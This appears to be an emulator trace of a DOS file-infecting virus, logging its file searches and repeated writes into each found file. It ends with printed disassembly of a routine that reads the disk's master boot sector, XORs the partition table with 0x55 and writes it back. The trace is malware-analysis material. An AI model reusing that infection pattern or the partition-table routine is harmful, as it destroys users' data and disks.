2018-12-25T11:47:47.875757989Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:47.878855897Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.880159095Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:47.881534003Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:47.88328627Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:47.890149277Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:47.897461774Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:47.905438973Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:47.908429295Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:47.911140602Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:47.923516303Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:47.925407794Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:47.941725369Z 62 PC: 12db5 | Close file
2018-12-25T11:47:47.952766426Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:47.956732744Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.964464251Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.972256116Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.974848899Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.976841505Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.980070941Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.982959609Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.992478023Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.001950075Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.006338577Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.014043176Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.021929069Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.024739471Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.032045805Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.035179265Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.03779485Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.048092746Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.057388244Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.061169595Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.068498619Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.07597473Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.078101662Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.088219135Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.092428434Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.094691404Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.105789397Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.115686603Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.119255851Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.128610596Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.136657818Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.13878354Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.141763548Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.145391409Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.147782844Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.15822867Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.168743051Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.171850853Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.179539972Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.187351694Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.189176318Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.191041863Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.19512744Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.197104984Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.207234459Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.222435305Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.240913686Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.248868963Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.257538325Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.260067807Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.262176537Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.266827166Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.269609941Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.279070596Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.288003931Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.292203059Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.300418145Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.303626131Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.306038224Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.308419484Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.311893663Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:48.314314109Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:48.316128747Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:48.323206466Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:48.325578439Z 44 PC: 12b82 | Get time 0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:48.664937124Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')